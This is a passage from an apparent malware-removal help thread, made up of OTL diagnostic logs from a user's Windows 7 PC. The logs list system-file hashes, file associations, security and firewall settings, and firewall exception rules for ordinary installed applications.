[2011/04/12 03:17:18 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\SysWOW64\en-US\services.msc
[2009/06/10 16:21:09 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\SysWOW64\services.msc
[2011/04/12 03:17:16 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\winsxs\amd64_microsoft-windows-s..cessnapin.resources_31bf3856ad364e35_6.1.7600.16385_en-us_003408aa160fce5b\services.msc
[2009/06/10 15:38:36 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\winsxs\amd64_microsoft-windows-servicessnapin_31bf3856ad364e35_6.1.7600.16385_none_2b58d44b5f6beb8a\services.msc
[2011/04/12 03:17:18 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\winsxs\x86_microsoft-windows-s..cessnapin.resources_31bf3856ad364e35_6.1.7600.16385_en-us_a4156d265db25d25\services.msc
[2009/06/10 16:21:09 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\winsxs\x86_microsoft-windows-servicessnapin_31bf3856ad364e35_6.1.7600.16385_none_cf3a38c7a70e7a54\services.msc
< MD5 for: SERVICES.PTXML >
[2009/07/13 15:16:17 | 000,001,061 | ---- | M] () MD5=640D7DD61B1CFA6C96F80F68F78CDFA7 -- C:\Windows\SysNative\wdi\perftrack\Services.ptxml
[2009/07/13 15:16:17 | 000,001,061 | ---- | M] () MD5=640D7DD61B1CFA6C96F80F68F78CDFA7 -- C:\Windows\winsxs\amd64_microsoft-windows-s..s-servicecontroller_31bf3856ad364e35_6.1.7600.16385_none_2b54b20ee6fa07b1\Services.ptxml
< MD5 for: SVCHOST.EXE >
[2009/07/13 20:14:41 | 000,020,992 | ---- | M] (Microsoft Corporation) MD5=54A47F6B5E09A77E61649109C6A08866 -- C:\Windows\winsxs\x86_microsoft-windows-services-svchost_31bf3856ad364e35_6.1.7600.16385_none_b591afc466a15356\svchost.exe
[2011/03/01 03:10:51 | 000,027,648 | ---- | M] (Microsoft Corporation) MD5=635455A95EB8EC47AC72142E501465ED -- C:\Windows\winsxs\amd64_microsoft-windows-services-svchost_31bf3856ad364e35_6.1.7601.21671_none_14271b75353e4391\svchost.exe
[2011/03/01 03:07:49 | 000,027,648 | ---- | M] (Microsoft Corporation) MD5=6F68F63794097E54F36474ED4384B759 -- C:\Windows\erdnt\cache64\svchost.exe
[2011/03/01 03:07:49 | 000,027,648 | ---- | M] (Microsoft Corporation) MD5=6F68F63794097E54F36474ED4384B759 -- C:\Windows\SysNative\svchost.exe
[2011/03/01 03:07:49 | 000,027,648 | ---- | M] (Microsoft Corporation) MD5=6F68F63794097E54F36474ED4384B759 -- C:\Windows\winsxs\amd64_microsoft-windows-services-svchost_31bf3856ad364e35_6.1.7601.17568_none_13af509c1c123937\svchost.exe
[2011/03/01 03:07:49 | 000,021,504 | ---- | M] (Microsoft Corporation) MD5=A91A288C91F9D9F1CFA4FAA9893C4D55 -- C:\Windows\winsxs\x86_microsoft-windows-services-svchost_31bf3856ad364e35_6.1.7601.21671_none_b8087ff17ce0d25b\svchost.exe
[2014/10/01 10:09:16 | 000,761,656 | ---- | M] (MalwareBytes) MD5=C0AFB3C7E6C7CA3F6E42FF242BBBCB1F -- C:\Program Files (x86)\Malwarebytes Anti-Malware\Chameleon\Windows\svchost.exe
[2009/07/13 20:39:46 | 000,027,136 | ---- | M] (Microsoft Corporation) MD5=C78655BC80301D76ED4FEF1C1EA40A7D -- C:\Windows\winsxs\amd64_microsoft-windows-services-svchost_31bf3856ad364e35_6.1.7600.16385_none_11b04b481efec48c\svchost.exe
[2011/03/01 03:05:31 | 000,021,504 | ---- | M] (Microsoft Corporation) MD5=ECDB182F885292145826C58252B53000 -- C:\Windows\erdnt\cache86\svchost.exe
[2011/03/01 03:05:31 | 000,021,504 | ---- | M] (Microsoft Corporation) MD5=ECDB182F885292145826C58252B53000 -- C:\Windows\SysWOW64\svchost.exe
[2011/03/01 03:05:31 | 000,021,504 | ---- | M] (Microsoft Corporation) MD5=ECDB182F885292145826C58252B53000 -- C:\Windows\winsxs\x86_microsoft-windows-services-svchost_31bf3856ad364e35_6.1.7601.17568_none_b790b51863b4c801\svchost.exe
< MD5 for: USERINIT.EXE >
[2010/11/20 22:23:55 | 000,026,624 | ---- | M] (Microsoft Corporation) MD5=61AC3EFDFACFDD3F0F11DD4FD4044223 -- C:\Windows\erdnt\cache86\userinit.exe
[2010/11/20 22:23:55 | 000,026,624 | ---- | M] (Microsoft Corporation) MD5=61AC3EFDFACFDD3F0F11DD4FD4044223 -- C:\Windows\SysWOW64\userinit.exe
[2010/11/20 22:23:55 | 000,026,624 | ---- | M] (Microsoft Corporation) MD5=61AC3EFDFACFDD3F0F11DD4FD4044223 -- C:\Windows\winsxs\x86_microsoft-windows-userinit_31bf3856ad364e35_6.1.7601.17514_none_de3024012ff21116\userinit.exe
[2010/11/20 22:24:28 | 000,030,720 | ---- | M] (Microsoft Corporation) MD5=BAFE84E637BF7388C96EF48D4D3FDD53 -- C:\Windows\erdnt\cache64\userinit.exe
[2010/11/20 22:24:28 | 000,030,720 | ---- | M] (Microsoft Corporation) MD5=BAFE84E637BF7388C96EF48D4D3FDD53 -- C:\Windows\SysNative\userinit.exe
[2010/11/20 22:24:28 | 000,030,720 | ---- | M] (Microsoft Corporation) MD5=BAFE84E637BF7388C96EF48D4D3FDD53 -- C:\Windows\winsxs\amd64_microsoft-windows-userinit_31bf3856ad364e35_6.1.7601.17514_none_3a4ebf84e84f824c\userinit.exe
< MD5 for: WINLOGON.EXE >
[2010/11/20 22:24:29 | 000,390,656 | ---- | M] (Microsoft Corporation) MD5=1151B1BAA6F350B1DB6598E0FEA7C457 -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.17514_none_cde90685eb910636\winlogon.exe
[2014/03/04 06:08:14 | 000,455,680 | ---- | M] (Microsoft Corporation) MD5=6CE2AE073BD21C542FC2C707CAE944CC -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.22616_none_ce748d1d04acf24f\winlogon.exe
[2014/03/04 04:43:50 | 000,455,168 | ---- | M] (Microsoft Corporation) MD5=88AB9B72B4BF3963A0DE0820B4B0B06C -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.18409_none_cdf8bf35eb848572\winlogon.exe
[2014/07/16 21:07:24 | 000,455,168 | ---- | M] (Microsoft Corporation) MD5=8CEBD9D0A0A879CDE9F36F4383B7CAEA -- C:\Windows\erdnt\cache64\winlogon.exe
[2014/07/16 21:07:24 | 000,455,168 | ---- | M] (Microsoft Corporation) MD5=8CEBD9D0A0A879CDE9F36F4383B7CAEA -- C:\Windows\SysNative\winlogon.exe
[2014/07/16 21:07:24 | 000,455,168 | ---- | M] (Microsoft Corporation) MD5=8CEBD9D0A0A879CDE9F36F4383B7CAEA -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.18540_none_cdc47ed1ebad0e4e\winlogon.exe
[2014/07/15 22:23:23 | 000,455,680 | ---- | M] (Microsoft Corporation) MD5=98AA0BFEE089C7E5DADB94190D93456C -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.22750_none_ce434d9704d2c730\winlogon.exe
[2014/10/01 10:09:16 | 000,761,656 | ---- | M] (MalwareBytes) MD5=C0AFB3C7E6C7CA3F6E42FF242BBBCB1F -- C:\Program Files (x86)\Malwarebytes Anti-Malware\Chameleon\Windows\winlogon.exe
< End of report >
ascot1340
2014-11-09, 22:54
Here is the Extras.Txt log
OTL Extras logfile created on: 11/8/2014 9:01:25 PM - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\Ryan\Desktop
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17358)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
7.90 Gb Total Physical Memory | 6.56 Gb Available Physical Memory | 83.07% Memory free
15.79 Gb Paging File | 13.87 Gb Available in Paging File | 87.86% Paging File free
Paging file location(s): ?:\pagefile.sys
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 919.21 Gb Total Space | 829.55 Gb Free Space | 90.25% Space Free | Partition Type: NTFS
Computer Name: RYAN-PC | User Name: Ryan | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
========== Extra Registry (SafeList) ==========
========== File Associations ==========
[b]64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.html[@ = htmlfile] -- C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
.url[@ = InternetShortcut] -- C:\Windows\SysNative\rundll32.exe (Microsoft Corporation)
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\Windows\SysWow64\control.exe (Microsoft Corporation)
.html [@ = htmlfile] -- C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
========== Shell Spawning ==========
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [print] -- rundll32.exe %SystemRoot%\system32\mshtml.dll,PrintHTML "%1" (Microsoft Corporation)
http [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
https [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
InternetShortcut [open] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l (Microsoft Corporation)
InternetShortcut [print] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [AddToPlaylistVLC] -- "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1" (VideoLAN)
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Directory [PlayWithVLC] -- "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1" (VideoLAN)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- "C:\Program Files\Internet Explorer\iexplore.exe" (Microsoft Corporation)
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
http [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
https [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [AddToPlaylistVLC] -- "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1" (VideoLAN)
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Directory [PlayWithVLC] -- "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1" (VideoLAN)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- Reg Error: Value error.
========== Security Center Settings ==========
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1
"FirewallDisableNotify" = 0
"AntiVirusDisableNotify" = 0
"UpdatesDisableNotify" = 0
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"VistaSp1" = 28 4D B2 76 41 04 CA 01 [binary data]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
========== System Restore Settings ==========
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR" = 0
========== Firewall Settings ==========
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall]
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile]
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
========== Authorized Applications List ==========
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
========== Vista Active Open Ports Exception List ==========
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{045DEC82-E4AC-4BF2-B6A7-8E350CF9F7D6}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{074C9272-A6C5-4CAB-9850-80B88271856A}" = lport=2869 | protocol=6 | dir=in | app=system |
"{1F7574DF-FCC4-44C0-9A7B-2928DBADEE50}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{2A827F28-6915-42A3-8479-B26D5C6FF0F6}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |
"{3EBB5621-63FD-49CB-A084-344E45133E29}" = lport=2177 | protocol=17 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{43ECA463-55F1-459B-954E-F557DBAB77DB}" = lport=139 | protocol=6 | dir=in | app=system |
"{4705EFA5-4F6D-41DE-BEC6-B28AA9D5D28C}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{61624434-D22A-4D12-A37B-27F99C70B6AE}" = lport=10243 | protocol=6 | dir=in | app=system |
"{61A85359-0354-45EA-B9A2-62C79F8EE11F}" = rport=10243 | protocol=6 | dir=out | app=system |
"{7638957D-8DA4-4DEB-84BD-85295A07617B}" = rport=138 | protocol=17 | dir=out | app=system |
"{809D5227-4F24-4618-A744-275CA1586490}" = rport=139 | protocol=6 | dir=out | app=system |
"{81BCEA7A-ABB8-48BB-8003-616369596713}" = lport=rpc | protocol=6 | dir=in | svc=spooler | app=%systemroot%\system32\spoolsv.exe |
"{85C76C07-10BD-41D9-87A3-BAD587F4AB2C}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{89BFA4DC-4699-4BB4-B6B8-44FD85AEA62B}" = lport=445 | protocol=6 | dir=in | app=system |
"{91FED168-5C8E-4B63-B77F-83F5D542E94F}" = lport=2177 | protocol=6 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{946D27E0-AF8E-4F93-94DE-BBDB46C390E4}" = lport=1900 | protocol=17 | dir=in | name=windows live communications platform (ssdp) |
"{AF31F970-A2F2-44B7-B314-4E481A3A3FD8}" = rport=445 | protocol=6 | dir=out | app=system |
"{AF7B7E83-5FB7-455C-95CA-5CBF463FE0A8}" = lport=2869 | protocol=6 | dir=in | name=windows live communications platform (upnp) |
"{C0244FD5-DBB1-4826-9D59-E5C06BCB250F}" = rport=2177 | protocol=6 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe |
"{C1B389EF-18A7-4CBD-AE04-123E274E0BAC}" = lport=rpc-epmap | protocol=6 | dir=in | svc=rpcss | name=@firewallapi.dll,-28539 |
"{C5BF095B-621D-4AF5-919B-F812369E35D0}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |
"{C799C2E4-AEB8-4F99-ADFA-D73D2DB5BE7B}" = lport=137 | protocol=17 | dir=in | app=system |
"{D095A7F6-558A-4D58-992B-B93A5A914B8C}" = rport=137 | protocol=17 | dir=out | app=system |
"{DB2C540C-8FF4-4A09-B1C0-1D99A695D782}" = lport=138 | protocol=17 | dir=in | app=system |
"{EA935328-1862-45DC-96B5-AFFA80CC4DEA}" = rport=2177 | protocol=17 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe |
========== Vista Active Application Exception List ==========
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{02EB3B4C-8624-49EF-AB8F-29C2EC19DD4D}" = protocol=1 | dir=out | name=@firewallapi.dll,-28544 |
"{086BCAE2-4D74-409E-8423-1816A532C379}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{0BE192B2-BB94-42D2-AB09-DEC8553ADA98}" = protocol=6 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\uninstall.exe |
"{0FC354C9-FA2F-436E-A2D9-A1AFC2F97531}" = protocol=58 | dir=in | name=@firewallapi.dll,-28545 |
"{111A665F-2E94-4685-9FF8-0293396EE84D}" = protocol=17 | dir=in | app=%programfiles(x86)%\windows media player\wmplayer.exe |
"{1849302A-1C9A-42FF-9C6A-28E209919120}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe |
"{1FA7115B-86DB-4420-A422-66670026B9B8}" = protocol=17 | dir=out | app=%programfiles(x86)%\windows media player\wmplayer.exe |
"{223E1EAC-D9A0-4576-9FAE-826B4662DD6E}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{249AC684-B980-42BD-8A7A-49E4596218DD}" = protocol=17 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |
"{28F715C9-D1D0-45C3-983F-176434930E1E}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe |
"{29B99958-5D7E-44C2-95ED-3E4B31B4DD3E}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{2E7F2C93-4833-4F43-9FFD-FEA068780677}" = protocol=17 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\idsalert.exe |
"{306D4CEA-0E1E-4B46-BB78-F15F8930764D}" = protocol=6 | dir=in | app=c:\program files (x86)\common files\common desktop agent\cdasrv.exe |
"{3147E72E-A39B-43C3-934E-3CF2B3BA8B5F}" = protocol=17 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\cdas2pc\cdas2pc.exe |
"{3595678D-D944-4F6F-AD76-8DF663889251}" = protocol=6 | dir=in | app=c:\program files\common files\common desktop agent\cdasrv.exe |
"{3ECB6891-14E5-44AE-BF91-95EFD581D364}" = protocol=17 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\cdas2pc\scan2pcnotify.exe |
"{422A94AA-28AC-4496-9D4C-B47B56B48AA1}" = protocol=6 | dir=out | app=%programfiles(x86)%\windows media player\wmplayer.exe |
"{47AD6022-1718-475A-940C-0465A4EB134B}" = dir=in | app=c:\program files (x86)\itunes\itunes.exe |
"{4D9C389B-97A1-4C3F-86F0-BBA9BBF017ED}" = protocol=6 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\ordersupplies.exe |
"{52221069-C4A9-4545-BEFF-512E27004917}" = protocol=17 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\ordersupplies.exe |
"{52449806-C299-48DA-8A17-9301560A9598}" = protocol=6 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe |
"{53013286-C963-432F-A351-1F9B81D59CEF}" = protocol=6 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\ids.application.exe |
"{53C69CC2-61CA-4A52-A91F-F0D7FB18BF35}" = dir=in | app=c:\program files (x86)\windows live\mesh\moe.exe |
"{55696D07-8A1C-45D5-8C63-12A4E43366D8}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe |
"{57E2BD63-5A08-4AC7-9500-D56B109A6F2C}" = dir=in | app=c:\program files (x86)\windows live\messenger\msnmsgr.exe |
"{5A9E53BA-5EFF-4961-92C4-5C1682E5824A}" = protocol=17 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\idsalert.exe |
"{67D30254-D2E5-47D2-BCAD-F24B101FD28B}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{683C148C-0AFB-4154-B5D8-CFD1B300F48A}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe |
"{6D2CCB4D-3BEA-4AC1-B411-28EF70A1198E}" = protocol=6 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\cdas2pc\cdas2pc.exe |
"{6DDE9889-33B0-484D-B8AB-8B8B83D1AA9A}" = protocol=17 | dir=in | app=c:\program files\common files\common desktop agent\cdasrv.exe |
"{6E4F8A6C-235D-40F6-8593-E11858E42044}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe |
"{6E8B5974-018E-4374-B0A3-4D5540B11E7B}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft office\office14\onenote.exe |
"{6EB07C3B-A50F-48C3-B850-57C520D1DE27}" = protocol=17 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\cdas2pc\cdas2pc.exe |
"{71979C74-EA58-4738-9804-5EDADCAB2D16}" = protocol=17 | dir=in | app=c:\program files\common files\common desktop agent\cdasrv.exe |
"{72D04B77-E0F7-4D95-8BF0-5A9F7D5C79FF}" = protocol=17 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\uninstall.exe |
"{78AD0A91-2C4B-4FC0-94FA-AC7ADB4C112F}" = protocol=17 | dir=in | app=c:\program files (x86)\common files\common desktop agent\cdasrv.exe |
"{7A3DA645-C7F4-4BE6-BFF8-92CE48CB8CE5}" = protocol=6 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\cdas2pc\scanprocess.exe |
"{7B9F8286-68B5-4E9A-819D-8E620A7943B0}" = protocol=6 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |
"{80BD8593-996F-42D2-A828-2FADF5ABA457}" = dir=in | app=c:\program files (x86)\windows live\contacts\wlcomm.exe |
"{8C3162E1-D6C4-4199-98D1-7DC5C7CFA2B6}" = protocol=6 | dir=in | app=c:\program files\common files\common desktop agent\cdasrv.exe |
"{8CFFD7B5-C5B3-421B-B872-FC27F9299404}" = protocol=6 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe |
"{8D56A144-53E7-486C-85AE-77E121D63F40}" = protocol=17 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\uninstall.exe |
"{935B30BF-6BD2-4E86-9220-050C8ACBAB26}" = protocol=6 | dir=in | app=c:\program files (x86)\common files\common desktop agent\cdasrv.exe |
"{9A169121-33D5-4003-B3A3-1E150E2F0B98}" = protocol=6 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\ordersupplies.exe |
"{9BEEC7E5-A8CE-40F9-905F-9ADDFEF8B978}" = protocol=6 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\idsalert.exe |
"{9EDF5511-2661-410A-8EDD-B81A430F0C4B}" = protocol=17 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\ids.application.exe |
"{A9630DCF-2949-4BDF-B6DE-1BA46DF54758}" = protocol=58 | dir=out | name=@firewallapi.dll,-28546 |
"{B493DEF6-1576-4302-8EF3-FFB39A4E1410}" = protocol=6 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\cdas2pc\scan2pcnotify.exe |
"{C5777947-2C80-4A71-9CE6-1AF90D7F1612}" = protocol=6 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\ids.application.exe |
"{C75C55BE-437D-4505-96C8-6C6F92351A2A}" = protocol=17 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\cdas2pc\scanprocess.exe |
"{D1B6BA29-8C67-4110-A6F2-10A41B874058}" = protocol=6 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\idsalert.exe |
"{D44DA923-0341-40F2-9E90-492E17D618F7}" = protocol=17 | dir=in | app=c:\program files (x86)\common files\common desktop agent\cdasrv.exe |
"{D978BB3A-5037-4A11-B2F0-E5C18044C299}" = protocol=6 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\uninstall.exe |
"{E59D0CF5-4EA6-4BD8-BBC2-0531861FE6CB}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe |
"{E6C46972-1489-4BED-AE52-FD0715512071}" = protocol=6 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\cdas2pc\cdas2pc.exe |
"{ECE1447E-CB5B-4FF0-924A-C2A89658253E}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft office\office14\onenote.exe |
"{EE10D390-EFBE-40CB-8241-6EECD2BD5688}" = protocol=1 | dir=in | name=@firewallapi.dll,-28543 |
"{EEC0D538-3C97-4926-BE44-F1F6B8CD2674}" = protocol=6 | dir=out | app=system |
"{F18B8467-9682-4BE8-9243-62D8B29CFB8F}" = protocol=17 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\ids.application.exe |
"{F4A5D122-52CE-42D6-A011-7CD62343EF6E}" = protocol=17 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe |
"{FC0A1FDD-44B4-49D4-9EB5-EF3BF5056890}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |
"{FFC53E80-2CF1-48BB-A928-7C1DB5F413FB}" = protocol=17 | dir=in | app=c:\program files (x86)\samsung\easy printer manager\ordersupplies.exe |
"TCP Query User{3FC8DDF4-7515-4E6B-9863-BC24F56E33F1}C:\program files\onone software\perfect photo suite 7\perfect photo suite 7.exe" = protocol=6 | dir=in | app=c:\program files\onone software\perfect photo suite 7\perfect photo suite 7.exe |
"TCP Query User{82194CFF-0E55-445A-AFB5-6B669431197A}C:\program files (x86)\internet explorer\iexplore.exe" = protocol=6 | dir=in | app=c:\program files (x86)\internet explorer\iexplore.exe |
